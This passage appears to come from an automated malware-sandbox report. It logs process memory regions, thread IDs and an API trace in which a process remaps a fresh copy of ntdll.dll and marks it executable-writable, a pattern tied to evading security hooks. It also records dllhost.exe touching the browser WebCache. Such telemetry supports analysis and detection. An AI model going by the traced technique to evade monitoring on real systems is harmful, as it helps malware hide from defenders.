monitored = 0 entry_point = 0x7007fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 3188 start_va = 0x70090000 end_va = 0x700bbfff monitored = 0 entry_point = 0x700abb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 3189 start_va = 0x700c0000 end_va = 0x700dffff monitored = 0 entry_point = 0x700cd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 3190 start_va = 0x700e0000 end_va = 0x700effff monitored = 0 entry_point = 0x700e4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 3191 start_va = 0x700f0000 end_va = 0x70153fff monitored = 0 entry_point = 0x7010afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 3192 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3193 start_va = 0x702c0000 end_va = 0x702c7fff monitored = 0 entry_point = 0x702c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3194 start_va = 0x702d0000 end_va = 0x7036afff monitored = 0 entry_point = 0x7030f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3195 start_va = 0x70370000 end_va = 0x70381fff monitored = 0 entry_point = 0x70374510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3196 start_va = 0x70390000 end_va = 0x7039afff monitored = 0 entry_point = 0x70394a50 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\SysWOW64\\tokenbinding.dll" (normalized: "c:\\windows\\syswow64\\tokenbinding.dll") Region: id = 3197 start_va = 0x703a0000 end_va = 0x705acfff monitored = 0 entry_point = 0x7048acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3198 start_va = 0x705b0000 end_va = 0x7072dfff monitored = 0 entry_point = 0x7062c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3199 start_va = 0x71b10000 end_va = 0x71b17fff monitored = 0 entry_point = 0x71b11920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 3200 start_va = 0x71b20000 end_va = 0x71b66fff monitored = 0 entry_point = 0x71b358d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 3201 start_va = 0x71b70000 end_va = 0x71b9efff monitored = 0 entry_point = 0x71b7bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3202 start_va = 0x71be0000 end_va = 0x71c63fff monitored = 0 entry_point = 0x71c06530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3203 start_va = 0x71c70000 end_va = 0x71cbefff monitored = 0 entry_point = 0x71c7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3204 start_va = 0x71cf0000 end_va = 0x71fbafff monitored = 0 entry_point = 0x71f2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3205 start_va = 0x72030000 end_va = 0x7205bfff monitored = 0 entry_point = 0x72045ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 3206 start_va = 0x72090000 end_va = 0x72112fff monitored = 0 entry_point = 0x720b37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 3207 start_va = 0x72120000 end_va = 0x7226afff monitored = 0 entry_point = 0x72181660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3208 start_va = 0x722d0000 end_va = 0x724e9fff monitored = 0 entry_point = 0x72365550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 3209 start_va = 0x73a70000 end_va = 0x73c8bfff monitored = 0 entry_point = 0x73c3bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 3210 start_va = 0x73d60000 end_va = 0x73e27fff monitored = 0 entry_point = 0x73dcae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 3211 start_va = 0x73e30000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73e39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3212 start_va = 0x73e50000 end_va = 0x73f1cfff monitored = 0 entry_point = 0x73ea29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 3213 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3214 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3215 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3216 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3217 start_va = 0x755c0000 end_va = 0x755cdfff monitored = 0 entry_point = 0x755c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3218 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3219 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3220 start_va = 0x75730000 end_va = 0x75821fff monitored = 0 entry_point = 0x75768070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 3221 start_va = 0x75830000 end_va = 0x75871fff monitored = 0 entry_point = 0x75846f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 3222 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3223 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3224 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3225 start_va = 0x75d90000 end_va = 0x75f07fff monitored = 0 entry_point = 0x75de8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3226 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3227 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3228 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3229 start_va = 0x76540000 end_va = 0x76552fff monitored = 0 entry_point = 0x76541d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3230 start_va = 0x76560000 end_va = 0x76566fff monitored = 0 entry_point = 0x76561e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3231 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3232 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3233 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3234 start_va = 0x76730000 end_va = 0x767b3fff monitored = 0 entry_point = 0x76756220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3235 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3236 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3237 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3238 start_va = 0x76bf0000 end_va = 0x76c81fff monitored = 0 entry_point = 0x76c28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3239 start_va = 0x76c90000 end_va = 0x76ceefff monitored = 0 entry_point = 0x76c94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3240 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3241 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3242 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3243 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3244 start_va = 0x77210000 end_va = 0x7726dfff monitored = 0 entry_point = 0x77227470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 3245 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3246 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3247 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3248 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3249 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3250 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3251 start_va = 0x7fff0000 end_va = 0x7df884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3252 start_va = 0x7df884cc0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df884cc0000" filename = "" Region: id = 3253 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3254 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 3258 start_va = 0x8e20000 end_va = 0x8fb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008e20000" filename = "" Region: id = 3261 start_va = 0x8fc0000 end_va = 0x913afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3266 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Thread: id = 136 os_tid = 0x6f8 Thread: id = 137 os_tid = 0x254 Thread: id = 138 os_tid = 0x728 Thread: id = 139 os_tid = 0xff8 Thread: id = 140 os_tid = 0x12d4 Thread: id = 141 os_tid = 0xe60 Thread: id = 142 os_tid = 0xaf0 Thread: id = 143 os_tid = 0x448 Thread: id = 144 os_tid = 0x9dc Thread: id = 145 os_tid = 0xefc Thread: id = 146 os_tid = 0x135c Thread: id = 147 os_tid = 0x1350 Thread: id = 148 os_tid = 0x1344 Thread: id = 149 os_tid = 0x1330 Thread: id = 150 os_tid = 0x132c Thread: id = 151 os_tid = 0x1328 Thread: id = 152 os_tid = 0x1324 Thread: id = 153 os_tid = 0x1320 Thread: id = 154 os_tid = 0x12c8 [0141.669] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f308 | out: HeapArray=0x19f308*=0x6f0000) returned 0x5 [0141.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f014, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.683] NtCreateFile (in: FileHandle=0x19f034, DesiredAccess=0x1200a0, ObjectAttributes=0x19effc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f01c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f034*=0x48c, IoStatusBlock=0x19f01c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0141.698] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x80cfaa0) returned 1 [0141.702] NtCreateSection (in: SectionHandle=0x19ef9c, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x48c | out: SectionHandle=0x19ef9c*=0x53c) returned 0x0 [0141.739] NtMapViewOfSection (in: SectionHandle=0x53c, ProcessHandle=0xffffffff, BaseAddress=0x19ef98*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef94*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ef98*=0x8fc0000, SectionOffset=0x0, ViewSize=0x19ef94*=0x17b000) returned 0x40000003 [0141.747] NtClose (Handle=0x48c) returned 0x0 [0141.748] NtClose (Handle=0x53c) returned 0x0 [0141.754] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f04c*=0x8fc0000, NumberOfBytesToProtect=0x19f05c, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f04c*=0x8fc0000, NumberOfBytesToProtect=0x19f05c, OldAccessProtection=0x19f048*=0x2) returned 0x0 [0141.755] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x8fc1000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x8fc1000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0141.769] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x90c6000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x90c6000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0141.770] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x90c7000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x90c7000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0141.770] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x90c8000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x90c8000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x8) returned 0x0 [0141.771] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x90cc000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x90cc000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x8) returned 0x0 [0141.874] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x90cf000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x90cf000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x2) returned 0x0 [0141.879] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9136000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9136000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x2) returned 0x0 Process: id = "38" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1efb8000" os_pid = "0xb3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3739 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3740 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3741 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3742 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3743 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3744 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3745 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3746 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3747 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3748 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3749 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3750 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3751 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3752 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3753 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3754 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3755 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3756 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3757 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3758 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3759 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3760 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3761 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3762 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3763 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3764 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: 